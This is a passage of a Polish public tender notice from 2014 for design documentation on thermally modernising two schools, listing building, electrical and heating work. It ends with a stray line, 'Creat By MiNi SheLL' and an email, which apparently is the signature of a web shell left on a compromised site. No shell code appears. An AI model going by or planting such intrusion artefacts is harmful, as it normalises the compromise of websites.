-demontaż oraz montaż (po wykonaniu ocieplenia) elementów znajdujących się na elewacjach np.: tablice informacyjne, kamery monitoringu, oprawy oświetleniowe, wyłączniki, daszki, kratki wentylacyjne, rolety zewnętrzne okienne itp. (w przypadku zniszczonych bądź  niepasujących kolorystycznie elementów-należy  zaprojektować nowe),
-demontaż oraz montaż po wykonani ocieplenia połaci dachu ,elementów typu 
wsporniki instalacji odgromowej, wentylatory, maszty antenowe itp. (w przypadku znacznego zużycia tych elementów-należy zaprojektować nowe), 
-remont pokrycia dachu (w przypadku  takiej konieczności i jeśli dach nie będzie  ocieplony za pomocą  styropapy ),
-wykonanie opaski wokół budynku,
-remont schodów zewnętrznych wraz z balustradami,

3. Branża elektryczna
Projekt budowlano - wykonawczy ma uwzględniać zapisy wniosku aplikacyjnego dla programu operacyjnego PL04i audytu efektywności ekologicznej.
Zakres projektu:
a)	instalacja oświetlenia w zakresie wymiany 337 istniejących pkt. świetlnych na energooszczędne świetlówki przy założeniu redukcji zapotrzebowania na energię elektryczną z 60627 kWh/rok dla istniejącego oświetlenia na 47987,9 kWh na rok dla oświetlenia energooszczędnego,
b)	wymiana oprzewodowania, zabezpieczenia prądowego i sterowania instalacją oświetleniową oraz roboty związane z naprawą tynków i malowaniem po robotach elektrycznych,
c)	 wymiana instalacji odgromowej - należy uwzględnić prace termomodernizacyjne,

4. Branża sanitarna
Zakres projektu:
a)	Inwentaryzacja instalacji c.o.,
b)	instalacja c.o. - określenie nastawy zaworów termostatycznych wraz z niezbędnymi obliczeniami  uwzględniając wymianę grzejników,
c)	układ rozdzielaczy,
d)	 instalacja c. w. u.,
e)	wentylacja budynku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 08.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Opracowanie dokumentacji projektowej termomodernizacji Zespołu Szkół Specjalnych os. Pawlikowskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Prace przygotowawcze - organizacja placu budowy
2. Branża budowlana
Termomodernizacja istniejącego budynku szkoły (na podstawie wniosku aplikacyjnego dla programu operacyjnego PL04 i audytu efektywności ekologicznej) -obejmująca między innymi:
a)	prace właściwe związane z termomodernizacją obiektów a zwłaszcza:
- wymiana drzwi zewnętrznych,
-ocieplenie ścian zewnętrznych z wykonaniem wzmocnienia ( kotwienia) ścian 
warstwowych, 	 
 - ocieplenie ścian piwnic przy gruncie
 - ocieplenie stropodachu nad budynkiem
b)	prace towarzyszące: 
-montaż i praca  rusztowań, 
-skucie i uzupełnienie odspojonego tynku, wykonanie wzmocnienia (kotwienia) ścian warstwowych. Na wzmocnienie ścian warstwowych należy wykonać  projekt  konstrukcyjny.
-wymiana instalacji odgromowej (nowe przewody poprowadzone na ścianach pod styropianem w rurkach niepalnych z dostępną puszką złącza kontrolnego), 
-wykończenie  cokołu budynku, 
-wymiana obróbek blacharskich, oraz wpustów dachowych,
-demontaż oraz montaż (po wykonaniu ocieplenia) elementów znajdujących się na elewacjach np.: tablice informacyjne, kamery monitoringu, oprawy oświetleniowe, wyłączniki, daszki, kratki wentylacyjne, rolety zewnętrzne okienne itp.(w przypadku zniszczonych bądź  niepasujących kolorystycznie elementów-należy zaprojektować nowe),
-demontaż oraz montaż po wykonani ocieplenia połaci dachu ,elementów typu 
wsporniki instalacji odgromowej, wentylatory, maszty antenowe itp. (w     
przypadku znacznego zużycia tych elementów-należy zaprojektować nowe), 
-remont pokrycia dachu (w przypadku  jeśli dach nie będzie  ocieplony za pomocą styropapy ),
-wykonanie opaski wokół budynku,
-likwidacja tarasów zewnętrznych na poziomie parteru,
-likwidacja schodów  zewnętrznych ewakuacyjnych z tarasu zlokalizowanego nad parterem po uzyskaniu pozytywnej opinii  rzeczoznawcy ds. zabezpieczeń przeciwpożarowych.

3. Branża elektryczna
Projekt budowlano - wykonawczy ma uwzględniać zapisy wniosku aplikacyjnego dla programu operacyjnego PL04 i audytu efektywności ekologicznej.
Zakres projektu:
a)	instalacja oświetlenia w zakresie wymiany 194 istniejących pkt. świetlnych na energooszczędne świetlówki przy założeniu redukcji zapotrzebowania na energię elektryczną z 18781,3 kWh na rok dla istniejącego oświetlenia na 13536,6 kWh na rok dla oświetlenia energooszczędnego,
b)	wymiana oprzewodowania, zabezpieczenia prądowego i sterowania instalacją oświetleniową oraz roboty związane z naprawą tynków i malowaniem po robotach elektrycznych,
c)	projekt wymiany instalacji odgromowej - należy uwzględnić prace termomodernizacyjne.

4. Branża sanitarna
Zakres projektu:
a)	inwentaryzacja instalacji c.o.,
b)	instalacja c.o. określająca nastawy zaworów termostatycznych wraz z niezbędnymi obliczeniami - uwzględnienie wymiany zaworów termostatycznych,
c)	instalacja c. w. u.,
d)	wentylacja budynku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 08.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Opracowanie dokumentacji projektowej termomodernizacji Szkoły Podstawowej nr 3 os. 700-lecia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Prace przygotowawcze - organizacja placu budowy
2. Branża budowlana
Termomodernizacja istniejącego budynku szkoły (na podstawie wniosku aplikacyjnego dla programu operacyjnego PL04 i audytu efektywności ekologicznej) - obejmująca między innymi:
a)	prace właściwe związane z termomodernizacją obiektów a zwłaszcza:
-wymiana okien zewnętrznych,
-wymiana drzwi zewnętrznych,
-ocieplenie ścian zewnętrznych z wyrównaniem powierzchni falistej ścian, 
-  ocieplenie stropodachów,
-  ocieplenie ścian piwnic przy gruncie.
b)	 prace towarzyszące: 
-montaż i praca  rusztowań, 
-wymiana instalacji odgromowej,(nowe przewody poprowadzone na ścianach pod styropianem w rurkach niepalnych z dostępną puszką złącza kontrolnego), 
-wykończenie  cokołu budynku,
-wymiana obróbek blacharskich, oraz rynien i rur spustowych,
-demontaż oraz montaż (po wykonaniu ocieplenia) elementów znajdujących się na elewacjach np.: tablice informacyjne, kamery monitoringu, oprawy oświetleniowe wyłączniki, daszki, kratki wentylacyjne, rolety zewnętrzne okienne itp.(w przypadku zniszczonych bądź  niepasujących kolorystycznie elementów-należy  zaprojektować nowe),
-demontaż oraz montaż po wykonani ocieplenia połaci dachu ,elementów typu wsporniki instalacji odgromowej, wentylatory, maszty antenowe itp. (w przypadku znacznego zużycia tych elementów-należy zaprojektować nowe), 
-remont pokrycia dachu (w przypadku  takiej konieczności i jeśli dach nie będzie ocieplony za pomocą  styropapy ).
-wykonanie opaski wokół budynku,
-remont schodów zewnętrznych wraz z balustradami,

3. Branża elektryczna 
Projekt budowlano - wykonawczy ma uwzględniać zapisy wniosku aplikacyjnego dla programu operacyjnego PL04 i audytu efektywności ekologicznej.
Zakres projektu:
-instalacja oświetlenia w zakresie wymiany 67 istniejących pkt. świetlnych na energooszczędne świetlówki przy założeniu redukcji zapotrzebowania na energię elektryczną z 66384,4 kWh/rok dla istniejącego oświetlenia na 64084 kWh/rok dla oświetlenia energooszczędnego,
b)	wymiana oprzewodowania, zabezpieczenia prądowego i sterowania instalacją oświetleniową oraz roboty związane z naprawą tynków i malowaniem po robotach elektrycznych,
c)	 wymiana instalacji odgromowej - należy uwzględnić prace termomodernizacyjne.
4. Branża sanitarna 
Zakres projektu:
a)	inwentaryzacja instalacji c.o.,
b)	instalacja c.o. - określenie nastawy zaworów termostatycznych wraz 
z niezbędnymi obliczeniami - uwzględnienie wymiany grzejników,
c)	 instalacji c. w. u.,
d)	 instalacja wod. - kan.
e)	Wentylacja budynku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 08.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com